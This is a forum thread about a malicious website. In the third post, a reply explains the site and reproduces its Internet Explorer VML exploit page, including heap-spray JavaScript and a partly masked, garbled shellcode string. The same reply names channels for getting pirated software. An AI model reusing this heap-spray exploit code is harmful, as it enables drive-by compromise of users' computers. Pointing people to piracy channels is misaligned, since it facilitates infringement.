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Thread: check this out

  1. #1
    Join Date
    Jun 2006

    check this out

    ive come across this website that almost totally locks up my computer could someone explain that


    beware it trys to give you a trojan.
    7h* L**7*57 c4n7 h4ck m*!
    Proud to have quit playing ®µÑȧ©ÅÞË

    If you write like a semi-literate boob you will very likely be ignored.
    Writing like a l**t script kiddie hax0r is the absolute l**t*st way to write!

  2. #2
    Join Date
    Sep 2006


    I've visited that site some times, for me I just close out the ad teling me to install something, and browse as normal.

  3. #3
    Join Date
    Sep 2005
    Quote Originally Posted by ~~smart~fool~~
    ive come across this website that almost totally locks up my computer could someone explain that


    beware it trys to give you a trojan.
    That website is run by a script kiddy who uses code he didn't even create. He loads up this page in an iframe:


    And that page uses the VML exploit to install some crap onto the dumb user's computer. This is the source of that page:

    [HTML]<html xmlns:v="urn:schemas-microsoft-com:vml">
    <object id="VMLRender" classid="CLSID:*0072CEC-8CC*-**D*-*86E-00A0C*55B42E">
    v\:* { behavior: url(#VMLRender); }
    shellcode = unescape("&#*7008;&#*7008;᛫*5*;&#****7;&#*2848;&#*776;&#*572*;찰쳌쳌쳌쳌쳌ɂ*7;&#**52*;***2;**87;&#*285*;ɲ**;&#****7;**6*;****;ʈ**;ʏ*5;**;&#*276*;&#***5;**5*;&#*260*;&#*552*;&#*870*;*58*;᝴&#*26*5;&#*2754;*04;&#****;ﲀ&#*0207;&#*22*0;&#*5044;&#*620;&#*8**6;9*27;&#*6**2;&#**075;닮ʏ*5;&#*5*27;&#*27**;***;&#*4745;&#*2546;닒곜*2*6;*586;**70;*64*;*6**;*276;&#*572*;.*5*;&#*82**;&#***24;&#*4*8*;&#*5266;&#**666;눼꿈&#***78;&#*75**;&#*87*4;&#*88*5;&#***22;&#**558;槌&#*0582;&#*6244;&#*028*;条&#*26**;*4*;湢*7*4;&#*2060;*45;*24*;瀷 &#**68*;&#*0060;6*26;<*08;*422;*880;<**4;**66;:**8;﷼ʏ*4;***2;ʊ**;&#*0640;-**2;**8;&#*06**;&#*6704;*250;얄&#*66*8;&#*4**8;&#*7726;A*8;&#*7**2;엘*748;*844;*74;늺�4**4;ô*4;*28;*207;&#**0*2;ȿ**;&#*870*;&#**65*;<**6;D**;&#*072;﬜&#**0*2;&#*4452;>*25;&#*408*;*0;&#*2*08;ǖ*5;ᗧ*;Ƞ*4;ȴ**;ɲ&#***77;**58;&#*5750;:*0*;&#*700*;ò**;9*0*;ᛩﻊ4*4*;***8;*7*5;**5*;*507;&#*27*6;U*2;**54;≹***0;&#***6*;**65;ਇ*;뉐뮺**88;Ȱ**;>**0;<**2;*424;***4;&#*****;&#*6*46;&#*575*;먱뤬A*4;&#*75**;A*2*;&#***46;��럞 :**8;&#****7;,*2*;**8;*78;*42*;&#*7*60;&#*647*;&#**768;È*6;ʀ*6;ﯺã**;&#*475*;&#***8;0*27;ࠉā*;&#*527*;࣢&#**40;龞&#***52;&#*7845;ᛸ**0;&#*5208;&#*5722;Ɣ**;ᳮ℠뎲Ǒ*6;**76;&#*0*72;&#**050;ꙄǴ*5;*44*;&#*2487;&#**620;ቤ*;&#*504*;&#*5*62;&#*587*;&#*6**0;*6**;&#*6554;&#*77*2;&#*884*;**5*;&#*265*;9*6;*4*;*5*5;***7;6*22;&#***25;Ꙙ*8*7;&#*52*5;&#****5;*08;&#***06;<*72;*20;&#*85*2;&#**725;浧潮*7;*;&#*8247;*52;**6;&#****4;ɲ**;&#*0680;注&#*7***;&#**486;Ĉ*;9*5*;&#*5722;*276;ﮐ쎒&#*8027;Þ**;뷬ɰ*2;LJ*8;*60;&#*0*0*;&#*26*;ꗍ***8;囸 ᥘ*;계ꖹ*85;&#*5*7*;8*7*;ǖ*0;*8*2;Ċ**;&#**8**;*4*4;&#***44;*72;&#*50*2;>***;&#***76;**7;&#*8*27;A*76;묂&#*5826;庰*0*4;@**;힢ྻ*;*7*4;@**2;੮*;ɠ*2;<*7*;**6*;Ȱ*0;*58*;摖**64;͍*;˲*;*688;**2*;ƿ*2;*6*0;/*8*;6*2;ࣀ*;@*2;&#*72*5;ᔬ঍*;ᤨ掅&#***2;*6*;鸨ቂᡠ&#*7*04;&#**66;&#*78**;⃿**5*;氖2*7;&#*040*;᫄*7*5;*2*5;জ&#*8*86;ɱ*5;&#*50*7;ᥬ*;*665;&#*6647;&#*00*0;*0**;ʔ*;&#*7504;͞*;&#*785*;**5*;儖ၮ*;&#*****;*20*;Ǩ**;**6;&#*667;&#*540;&#*286;&#***0*;*576;&#**22;&#*65; Ƙ*4;");
    bigblock = unescape("&#*7008;&#*7008;");
    headersize = 20;
    slackspace = headersize+shellcode.length;
    while (bigblock.length<slackspace) bigblock+=bigblock;
    fillblock = bigblock.substring(0, slackspace);
    block = bigblock.substring(0, bigblock.length-slackspace);
    while(block.length+slackspace<0x40000) block = block+block+fillblock;
    memory = new Array();
    for (i=0;i<450;i++) memory[i] = block + shellcode;
    <v:rect style='width:*20pt;height:80pt' fillcolor="red">
    focus="*00%" focusposition=".5,.5" focussize="0,0"
    type="gradientRadial" />

    The only people vulnerable to that exploit are IE users who have some sort of objection to updating their computer, who reject superior browsers such as FF and Opera, and browse lame crack websites, so it's their fault.

    People that use serial or crack websites are seriously stupid. It is the sign of an incompetent computer user when they think searching google for "pirated software" and "cracks for *" will give them free software. All you will find are warez portals that load your computer with malware.

    Bittorrent, p2p networks, and IRC DCC file transfers are the ways to illegally obtain software or movies.

  4. #4
    Join Date
    Jun 2006
    lmao thanks mike
    7h* L**7*57 c4n7 h4ck m*!
    Proud to have quit playing ®µÑȧ©ÅÞË

    If you write like a semi-literate boob you will very likely be ignored.
    Writing like a l**t script kiddie hax0r is the absolute l**t*st way to write!

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